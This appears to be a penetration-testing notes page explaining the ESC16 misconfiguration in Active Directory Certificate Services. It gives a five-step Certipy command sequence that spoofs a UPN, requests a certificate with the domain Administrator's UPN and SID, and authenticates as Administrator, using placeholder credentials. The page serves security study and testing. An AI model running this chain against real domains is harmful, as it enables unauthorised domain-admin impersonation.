ESC16
ABOUT
ESC16 is a misconfiguration in Active Directory Certificate Services where the CA is globally set—via the DisableExtensionList registry key or due to missing patches—to omit the szOID_NTDS_CA_SECURITY_EXT SID extension from all issued certificates, which breaks strong certificate-to-user mapping and allows attackers, under certain conditions (like DCs set to compatibility mode or combined with ESC6), to spoof UPNs or inject SIDs in SAN fields to impersonate privileged accounts using forged certificates.
ESC6: Lets you inject your own UPN and SID into the SAN (Subject Alternative Name) field of a certificate request.
ESC16: The CA is misconfigured to not include the SID extension (
szOID_NTDS_CA_SECURITY_EXT) in certificates.
EXPLOITATION
If you would look into Certipy's docs, there is Scenario A and Scenario B, this is a little bit of both. Updating UPN part is from Scenario A, and requesting certificate with adding our UPN and SID is from Scenario B
Updating UPN
certipy account -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -upn 'Administrator' -user 'some_svc' updateExctracting Admin's SID
certipy account -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -upn 'Administrator' -user 'some_svc' readRequesting valid Admin's cert
certipy req -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -target 'dc01.militech.local' -ca 'militech-DC01-CA' -template 'User' -upn 'administrator@militech.local' -sid 'S-1-5-21-...-500'Updating back UPN
certipy account -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -upn 'some_svc' -user 'some_svc' update Authenticating as Admin
certipy auth -pfx 'administrator.pfx' -username 'Administrator' -domain militech.local -dc-ip '13.13.13.13'RESOURCES
Last updated